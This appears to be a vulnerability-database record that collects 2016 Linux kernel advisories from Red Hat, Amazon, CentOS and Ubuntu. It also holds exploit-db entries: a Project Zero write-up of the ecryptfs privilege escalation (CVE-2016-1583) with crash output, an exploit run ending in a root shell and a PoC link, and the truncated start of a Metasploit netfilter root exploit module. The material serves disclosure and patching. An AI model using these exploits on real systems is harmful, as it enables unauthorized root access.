use-after-free style attack. (CVE-2016-4470, Important)\n\nThis issue was discovered by David Howells (Red Hat Inc.).", "modified": "2016-10-18T17:58:58", "published": "2016-10-18T17:53:29", "id": "RHSA-2016:2076", "href": "https://access.redhat.com/errata/RHSA-2016:2076", "type": "redhat", "title": "(RHSA-2016:2076) Important: kernel security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:45:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw was found in the Linux kernel's keyring handling code, where in key_reject_and_link() an uninitialized variable would eventually lead to arbitrary free address which could allow attacker to use a use-after-free style attack. (CVE-2016-4470, Important)\n\nThis issue was discovered by David Howells (Red Hat Inc.).\n\nBug Fix(es):\n\n* Previously, the BUG_ON() signal appeared in the fs_clear_inode() function where the nfs_have_writebacks() function reported a positive value for nfs_inode->npages. As a consequence, a kernel panic occurred. This update performs a serialization by holding the inode i_lock over the check of PagePrivate and locking the request, which fixes this bug. (BZ#1365161)", "modified": "2016-10-18T14:40:04", "published": "2016-10-18T14:37:45", "id": "RHSA-2016:2074", "href": "https://access.redhat.com/errata/RHSA-2016:2074", "type": "redhat", "title": "(RHSA-2016:2074) Important: kernel security and bug fix update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9806", "CVE-2016-4951", "CVE-2016-4997", "CVE-2016-4998"], "description": "**Issue Overview:**\n\nA flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitary kernel memory when unloading a kernel module. This action is usually restricted to root-priveledged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS. ([CVE-2016-4997 __](<https://access.redhat.com/security/cve/CVE-2016-4997>))\n\nAn out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. ([CVE-2016-4998 __](<https://access.redhat.com/security/cve/CVE-2016-4998>))\n\nA vulnerability was found in the Linux kernel. The pointer to the netlink socket attribute is not checked, which could cause a null pointer dereference when parsing the nested attributes in function tipc_nl_publ_dump(). \nThis allows local users to cause a DoS. ([CVE-2016-4951 __](<https://access.redhat.com/security/cve/CVE-2016-4951>))\n\nA double free vulnerability was found in netlink_dump, which could cause a denial of service or possibly other unspecified impact. ([CVE-2016-9806 __](<https://access.redhat.com/security/cve/CVE-2016-9806>))\n\n(Updated on 2016-07-14: [CVE-2016-4998 __](<https://access.redhat.com/security/cve/CVE-2016-4998>) and [CVE-2016-4951 __](<https://access.redhat.com/security/cve/CVE-2016-4951>) were fixed in this version, but was not previously listed in this errata.)\n\n(Updated on 2017-01-19: [CVE-2016-9806 __](<https://access.redhat.com/security/cve/CVE-2016-9806>) was fixed in this release but was previously not part of this errata.)\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-4.4.14-24.50.amzn1.i686 \n kernel-devel-4.4.14-24.50.amzn1.i686 \n kernel-tools-4.4.14-24.50.amzn1.i686 \n perf-debuginfo-4.4.14-24.50.amzn1.i686 \n kernel-4.4.14-24.50.amzn1.i686 \n kernel-headers-4.4.14-24.50.amzn1.i686 \n kernel-debuginfo-common-i686-4.4.14-24.50.amzn1.i686 \n kernel-debuginfo-4.4.14-24.50.amzn1.i686 \n kernel-tools-debuginfo-4.4.14-24.50.amzn1.i686 \n kernel-tools-devel-4.4.14-24.50.amzn1.i686 \n \n noarch: \n kernel-doc-4.4.14-24.50.amzn1.noarch \n \n src: \n kernel-4.4.14-24.50.amzn1.src \n \n x86_64: \n perf-debuginfo-4.4.14-24.50.amzn1.x86_64 \n kernel-tools-debuginfo-4.4.14-24.50.amzn1.x86_64 \n kernel-4.4.14-24.50.amzn1.x86_64 \n kernel-tools-4.4.14-24.50.amzn1.x86_64 \n kernel-headers-4.4.14-24.50.amzn1.x86_64 \n kernel-devel-4.4.14-24.50.amzn1.x86_64 \n perf-4.4.14-24.50.amzn1.x86_64 \n kernel-tools-devel-4.4.14-24.50.amzn1.x86_64 \n kernel-debuginfo-4.4.14-24.50.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.4.14-24.50.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2016-06-24T22:21:00", "published": "2016-06-24T22:21:00", "id": "ALAS-2016-718", "href": "https://alas.aws.amazon.com/ALAS-2016-718.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:29:08", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6198", "CVE-2016-4997", "CVE-2016-6197", "CVE-2016-4998", "CVE-2016-3134"], "description": "**CentOS Errata and Security Advisory** CESA-2016:1847\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A security flaw was found in the Linux kernel in the mark_source_chains() function in \"net/ipv4/netfilter/ip_tables.c\". It is possible for a user-supplied \"ipt_entry\" structure to have a large \"next_offset\" field. This field is not bounds checked prior to writing to a counter value at the supplied offset. (CVE-2016-3134, Important)\n\n* A flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitrary kernel memory when unloading a kernel module. This action is usually restricted to root-privileged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated privileges. (CVE-2016-4997, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)\n\nBug Fix(es):\n\n* In some cases, running the ipmitool command caused a kernel panic due to a race condition in the ipmi message handler. This update fixes the race condition, and the kernel panic no longer occurs in the described scenario. (BZ#1353947)\n\n* Previously, running I/O-intensive operations in some cases caused the system to terminate unexpectedly after a null pointer dereference in the kernel. With this update, a set of patches has been applied to the 3w-9xxx and 3w-sas drivers that fix this bug. As a result, the system no longer crashes in the described scenario. (BZ#1362040)\n\n* Previously, the Stream Control Transmission Protocol (SCTP) sockets did not inherit the SELinux labels properly. As a consequence, the sockets were labeled with the unlabeled_t SELinux type which caused SCTP connections to fail. The underlying source code has been modified, and SCTP connections now works as expected. (BZ#1354302)\n\n* Previously, the bnx2x driver waited for transmission completions when recovering from a parity event, which substantially increased the recovery time. With this update, bnx2x does not wait for transmission completion in the described circumstances. As a result, the recovery of bnx2x after a parity event now takes less time. (BZ#1351972)\n\nEnhancement(s):\n\n* With this update, the audit subsystem enables filtering of processes by name besides filtering by PID. Users can now audit by executable name (with the \"-F exe=<path-to-executable>\" option), which allows expression of many new audit rules. This functionality can be used to create events when specific applications perform a syscall. (BZ#1345774)\n\n* With this update, the Nonvolatile Memory Express (NVMe) and the multi-queue block layer (blk_mq) have been upgraded to the Linux 4.5 upstream version. Previously, a race condition between timeout and freeing request in blk_mq occurred, which could affect the blk_mq_tag_to_rq() function and consequently a kernel oops could occur. The provided patch fixes this race condition by updating the tags with the active request. The patch simplifies blk_mq_tag_to_rq() and ensures that the two requests are not active at the same time. (BZ#1350352)\n\n* The Hyper-V storage driver (storvsc) has been upgraded from upstream. This update provides moderate performance improvement of I/O operations when using storvscr for certain workloads. (BZ#1360161)\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included in this advisory. To see the complete list of bug fixes and enhancements, refer to the following KnowledgeBase article: https://access.redhat.com/articles/2592321\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-September/034123.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-1847.html", "edition": 5, "modified": "2016-09-19T15:43:06", "published": "2016-09-19T15:43:06", "id": "CESA-2016:1847", "href": "http://lists.centos.org/pipermail/centos-announce/2016-September/034123.html", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:55", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "Jann Horn discovered that eCryptfs improperly attempted to use the mmap() \nhandler of a lower filesystem that did not implement one, causing a \nrecursive page fault to occur. A local unprivileged attacker could use to \ncause a denial of service (system crash) or possibly execute arbitrary code \nwith administrative privileges.", "edition": 5, "modified": "2016-06-10T00:00:00", "published": "2016-06-10T00:00:00", "id": "USN-3008-1", "href": "https://ubuntu.com/security/notices/USN-3008-1", "title": "Linux kernel (Qualcomm Snapdragon) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "Jann Horn discovered that eCryptfs improperly attempted to use the mmap() \nhandler of a lower filesystem that did not implement one, causing a \nrecursive page fault to occur. A local unprivileged attacker could use to \ncause a denial of service (system crash) or possibly execute arbitrary code \nwith administrative privileges.", "edition": 5, "modified": "2016-06-10T00:00:00", "published": "2016-06-10T00:00:00", "id": "USN-2999-1", "href": "https://ubuntu.com/security/notices/USN-2999-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:22:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4913", "CVE-2016-4951", "CVE-2016-4569", "CVE-2016-4997", "CVE-2016-4482", "CVE-2016-4578", "CVE-2016-4580", "CVE-2016-4998"], "description": "Jesse Hertz and Tim Newsham discovered that the Linux netfilter \nimplementation did not correctly perform validation when handling 32 bit \ncompatibility IPT_SO_SET_REPLACE events on 64 bit platforms. A local \nunprivileged attacker could use this to cause a denial of service (system \ncrash) or execute arbitrary code with administrative privileges. \n(CVE-2016-4997)\n\nKangjie Lu discovered an information leak in the core USB implementation in \nthe Linux kernel. A local attacker could use this to obtain potentially \nsensitive information from kernel memory. (CVE-2016-4482)\n\nKangjie Lu discovered an information leak in the timer handling \nimplementation in the Advanced Linux Sound Architecture (ALSA) subsystem of \nthe Linux kernel. A local attacker could use this to obtain potentially \nsensitive information from kernel memory. (CVE-2016-4569, CVE-2016-4578)\n\nKangjie Lu discovered an information leak in the X.25 Call Request handling \nin the Linux kernel. A local attacker could use this to obtain potentially \nsensitive information from kernel memory. (CVE-2016-4580)\n\nIt was discovered that an information leak exists in the Rock Ridge \nimplementation in the Linux kernel. A local attacker who is able to mount a \nmalicious iso9660 file system image could exploit this flaw to obtain \npotentially sensitive information from kernel memory. (CVE-2016-4913)\n\nBaozeng Ding discovered that the Transparent Inter-process Communication \n(TIPC) implementation in the Linux kernel did not verify socket existence \nbefore use in some situations. A local attacker could use this to cause a \ndenial of service (system crash). (CVE-2016-4951)\n\nJesse Hertz and Tim Newsham discovered that the Linux netfilter \nimplementation did not correctly perform validation when handling \nIPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to \ncause a denial of service (system crash) or obtain potentially sensitive \ninformation from kernel memory. (CVE-2016-4998)", "edition": 5, "modified": "2016-06-27T00:00:00", "published": "2016-06-27T00:00:00", "id": "USN-3017-1", "href": "https://ubuntu.com/security/notices/USN-3017-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:45:12", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4913", "CVE-2016-4951", "CVE-2016-4569", "CVE-2016-4997", "CVE-2016-4482", "CVE-2016-4578", "CVE-2016-4580", "CVE-2016-4998"], "description": "Jesse Hertz and Tim Newsham discovered that the Linux netfilter \nimplementation did not correctly perform validation when handling 32 bit \ncompatibility IPT_SO_SET_REPLACE events on 64 bit platforms. A local \nunprivileged attacker could use this to cause a denial of service (system \ncrash) or execute arbitrary code with administrative privileges. \n(CVE-2016-4997)\n\nKangjie Lu discovered an information leak in the core USB implementation in \nthe Linux kernel. A local attacker could use this to obtain potentially \nsensitive information from kernel memory. (CVE-2016-4482)\n\nKangjie Lu discovered an information leak in the timer handling \nimplementation in the Advanced Linux Sound Architecture (ALSA) subsystem of \nthe Linux kernel. A local attacker could use this to obtain potentially \nsensitive information from kernel memory. (CVE-2016-4569, CVE-2016-4578)\n\nKangjie Lu discovered an information leak in the X.25 Call Request handling \nin the Linux kernel. A local attacker could use this to obtain potentially \nsensitive information from kernel memory. (CVE-2016-4580)\n\nIt was discovered that an information leak exists in the Rock Ridge \nimplementation in the Linux kernel. A local attacker who is able to mount a \nmalicious iso9660 file system image could exploit this flaw to obtain \npotentially sensitive information from kernel memory. (CVE-2016-4913)\n\nBaozeng Ding discovered that the Transparent Inter-process Communication \n(TIPC) implementation in the Linux kernel did not verify socket existence \nbefore use in some situations. A local attacker could use this to cause a \ndenial of service (system crash). (CVE-2016-4951)\n\nJesse Hertz and Tim Newsham discovered that the Linux netfilter \nimplementation did not correctly perform validation when handling \nIPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to \ncause a denial of service (system crash) or obtain potentially sensitive \ninformation from kernel memory. (CVE-2016-4998)", "edition": 5, "modified": "2016-06-27T00:00:00", "published": "2016-06-27T00:00:00", "id": "USN-3016-3", "href": "https://ubuntu.com/security/notices/USN-3016-3", "title": "Linux kernel (Qualcomm Snapdragon) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-06-21T17:03:06", "description": "Linux - ecryptfs and /proc/$pid/environ Privilege Escalation. CVE-2016-1583. Local exploit for linux platform", "published": "2016-06-21T00:00:00", "type": "exploitdb", "title": "Linux - ecryptfs and /proc/$pid/environ Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1583"], "modified": "2016-06-21T00:00:00", "id": "EDB-ID:39992", "href": "https://www.exploit-db.com/exploits/39992/", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=836\r\n\r\nStacking filesystems, including ecryptfs, protect themselves against\r\ndeep nesting, which would lead to kernel stack overflow, by tracking\r\nthe recursion depth of filesystems. E.g. in ecryptfs, this is\r\nimplemented in ecryptfs_mount() as follows:\r\n\r\n\ts->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;\r\n\r\n\trc = -EINVAL;\r\n\tif (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {\r\n\t\tpr_err(\"eCryptfs: maximum fs stacking depth exceeded\\n\");\r\n\t\tgoto out_free;\r\n\t}\r\n\r\n\r\nThe files /proc/$pid/{mem,environ,cmdline}, when read, access the\r\nuserspace memory of the target process, involving, if necessary,\r\nnormal pagefault handling. If it was possible to mmap() them, an\r\nattacker could create a chain of e.g. /proc/$pid/environ mappings\r\nwhere process 1 has /proc/2/environ mapped into its environment area,\r\nprocess 2 has /proc/3/environ mapped into its environment area and so\r\non. A read from /proc/1/environ would invoke the pagefault handler for\r\nprocess 1, which would invoke the pagefault handler for process 2 and\r\nso on. This would, again, lead to kernel stack overflow.\r\n\r\n\r\nOne interesting fact about ecryptfs is that, because of the encryption\r\ninvolved, it doesn't just forward mmap to the lower file's mmap\r\noperation. Instead, it has its own page cache, maintained using the\r\nnormal filemap helpers, and performs its cryptographic operations when\r\ndirty pages need to be written out or when pages need to be faulted\r\nin. Therefore, not just its read and write handlers, but also its mmap\r\nhandler only uses the lower filesystem's read and write methods.\r\nThis means that using ecryptfs, you can mmap [decrypted views of]\r\nfiles that normally wouldn't be mappable.\r\n\r\nCombining these things, it is possible to trigger recursion with\r\narbitrary depth where:\r\n\r\na reading userspace memory access in process A (from userland or from\r\n copy_from_user())\r\ncauses a pagefault in an ecryptfs mapping in process A, which\r\ncauses a read from /proc/{B}/environ, which\r\ncauses a pagefault in an ecryptfs mapping in process B, which\r\ncauses a read from /proc/{C}/environ, which\r\ncauses a pagefault in an ecryptfs mapping in process C, and so on.\r\n\r\nOn systems with the /sbin/mount.ecryptfs_private helper installed\r\n(e.g. Ubuntu if the \"encrypt my home directory\" checkbox is ticked\r\nduring installation), this bug can be triggered by an unprivileged\r\nuser. The mount helper considers /proc/$pid, where $pid is the PID of\r\na process owned by the user, to be a valid mount source because the\r\ndirectory is \"owned\" by the user.\r\n\r\nI have attached both a generic crash PoC and a build-specific exploit\r\nthat can be used to gain root privileges from a normal user account on\r\nUbuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version\r\n4.4.0-22.40, uname \"Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu\r\nSMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\".\r\n\r\ndmesg output of the crasher:\r\n\r\n```\r\n[ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0\r\n[ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] PGD 1e0d067 PUD 0 \r\n[ 80.040028] Thread overran stack, or stack corrupted\r\n[ 80.040028] Oops: 0000 [#1] SMP \r\n[ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video\r\n[ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu\r\n[ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006\r\n[ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000\r\n[ 80.040028] RIP: 0010:[<ffffffff810c9a33>] [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] RSP: 0000:ffff88021fc03d70 EFLAGS: 00010046\r\n[ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068\r\n[ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200\r\n[ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000\r\n[ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200\r\n[ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68\r\n[ 80.040028] FS: 00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000\r\n[ 80.040028] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0\r\n[ 80.040028] Stack:\r\n[ 80.040028] ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00\r\n[ 80.040028] ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68\r\n[ 80.040028] ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200\r\n[ 80.040028] Call Trace:\r\n[ 80.040028] <IRQ> \r\n[ 80.040028] [<ffffffff810b4b83>] update_curr+0xe3/0x160\r\n[ 80.040028] [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0\r\n[ 80.040028] [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80\r\n[ 80.040028] [<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0\r\n[ 80.040028] [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0\r\n[ 80.040028] [<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60\r\n[ 80.040028] [<ffffffff810ee961>] update_process_times+0x51/0x60\r\n[ 80.040028] [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60\r\n[ 80.040028] [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70\r\n[ 80.040028] [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290\r\n[ 80.040028] [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0\r\n[ 80.040028] [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60\r\n[ 80.040028] [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50\r\n[ 80.040028] [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90\r\n[ 80.040028] <EOI> \r\n[ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d \r\n[ 80.040028] RIP [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] RSP <ffff88021fc03d70>\r\n[ 80.040028] CR2: fffffffe4b9145c0\r\n[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16\r\n[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16\r\n[ 80.040028] ---[ end trace 616e3de50958c35b ]---\r\n[ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt\r\n[ 80.040028] Shutting down cpus with NMI\r\n[ 80.040028] Kernel Offset: disabled\r\n[ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt\r\n```\r\n\r\nexample run of the exploit, in a VM with 4 cores, with Ubuntu 16.04 installed:\r\n\r\n```\r\nuser@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls\r\ncompile.sh exploit.c hello.c suidhelper.c\r\nuser@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh \r\nuser@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls\r\ncompile.sh exploit exploit.c hello hello.c suidhelper suidhelper.c\r\nuser@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit\r\nall spammers ready\r\nrecurser parent ready\r\nspam over\r\nfault chain set up, faulting now\r\nwriting stackframes\r\nstackframes written\r\nkilling 2494\r\npost-corruption code is alive!\r\nchildren should be dead\r\ncoredump handler set. recurser exiting.\r\ngoing to crash now\r\nsuid file detected, launching rootshell...\r\nwe have root privs now...\r\nroot@user-VirtualBox:/proc# id\r\nuid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)\r\n```\r\n\r\n(If the exploit crashes even with the right kernel version, try\r\nrestarting the machine. Also, ensure that no program like top/htop/...\r\nis running that might try to read process command lines. Note that\r\nthe PoC and the exploit don't really clean up after themselves and\r\nleave mountpoints behind that prevent them from re-running without\r\na reboot or manual unmounting.)\r\n\r\nNote that Ubuntu compiled their kernel with\r\nCONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used\r\nto be in the past to not crash the kernel while exploiting this bug,\r\nand an overwrite of addr_limit would be useless because at the\r\ntime the thread_info is overwritten, there are multiple instances of\r\nkernel_read() on the stack. Still, the bug is exploitable by carefully\r\naligning the stack so that the vital components of thread_info are\r\npreserved, stopping with an out-of-bounds stack pointer and\r\noverwriting the thread stack using a normal write to an adjacent\r\nallocation of the buddy allocator.\r\n\r\nRegarding the fix, I think the following would be reasonable:\r\n\r\n - Explicitly forbid stacking anything on top of procfs by setting its\r\n s_stack_depth to a sufficiently large value. In my opinion, there\r\n is too much magic going on inside procfs to allow stacking things\r\n on top of it, and there isn't any good reason to do it. (For\r\n example, ecryptfs invokes open handlers from a kernel thread\r\n instead of normal user process context, so the access checks inside\r\n VFS open handlers are probably ineffective - and procfs relies\r\n heavily on those.)\r\n\r\n - Forbid opening files with f_op->mmap==NULL through ecryptfs. If the\r\n lower filesystem doesn't expect to be called in pagefault-handling\r\n context, it probably shouldn't be called in that context.\r\n\r\n - Create a dedicated kernel stack cache outside of the direct mapping\r\n of physical memory that has a guard page (or a multi-page gap) at\r\n the bottom of each stack, and move the struct thread_info to a\r\n different place (if nothing else works, the top of the stack, above\r\n the pt_regs).\r\n While e.g. race conditions are more common than stack overflows in\r\n the Linux kernel, the whole vulnerability class of stack overflows\r\n is easy to mitigate, and the kernel is sufficiently complicated for\r\n unbounded recursion to emerge in unexpected places - or perhaps\r\n even for someone to discover a way to create a stack with a bounded\r\n length that is still too high. Therefore, I believe that guard\r\n pages are a useful mitigation.\r\n Nearly everywhere, stack overflows are caught using guard pages\r\n nowadays; this includes Linux userland, but also {### TODO ###}\r\n and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).\r\n\r\nOh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))`\r\nin schedule_debug() ought to be a direct panic instead of an oops. At\r\nthe moment, when you hit it, you get a recursion between the scheduler\r\ninvocation in do_exit() and the BUG_ON in the scheduler, and the\r\nkernel recurses down the stack until it hits something sufficiently\r\nimportant to cause a panic.\r\n\r\nI'm going to send (compile-tested) patches for my first two fix\r\nsuggestions and the recursive oops bug. I haven't written a patch for\r\nthe guard pages mitigation - I'm not familiar enough with the x86\r\nsubsystem for that.\r\n\r\n\r\nNotes regarding the exploit:\r\n\r\nIt makes an invalid assumption that causes it to require at least around 6GB of RAM.\r\n\r\nIt has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.\r\n\r\nThe page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39992.zip\r\n\r\n", "cvss": {"score": 7.3, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:HIGH/I:HIGH/A:HIGH/"}, "sourceHref": "https://www.exploit-db.com/download/39992/"}, {"lastseen": "2016-09-28T01:29:56", "description": "Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit). CVE-2016-4997. Local exploit for Lin_x86 platform. Tags: ", "published": "2016-09-27T00:00:00", "type": "exploitdb", "title": "Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-09-27T00:00:00", "id": "EDB-ID:40435", "href": "https://www.exploit-db.com/exploits/40435/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire \"msf/core\"\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently\r\n only works against Ubuntu 16.04 (not 16.04.1) with kernel\r\n 4.4.0-21-generic.\r\n Several conditions have to be met for successful exploitation:\r\n Ubuntu:\r\n 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\r\n 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\r\n Kernel 4.4.0-31-generic and newer are not vulnerable.\r\n\r\n We write the ascii files and compile on target instead of locally since metasm bombs for not\r\n having cdefs.h (even if locally installed)\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'h00die <mike@stcyrsecurity.com>', # Module\r\n 'vnik' # Discovery\r\n ],\r\n 'DisclosureDate' => 'Jun 03 2016',\r\n 'Platform' => [ 'linux'],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Ubuntu', { } ]\r\n #[ 'Fedora', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'References' =>\r\n [\r\n [ 'EDB', '40049'],\r\n [ 'CVE', '2016-4997'],\r\n [ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']\r\n ]\r\n ))\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),\r\n OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),\r\n OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n def iptables_loaded?()\r\n # user@ubuntu:~$ cat /proc/modules | grep 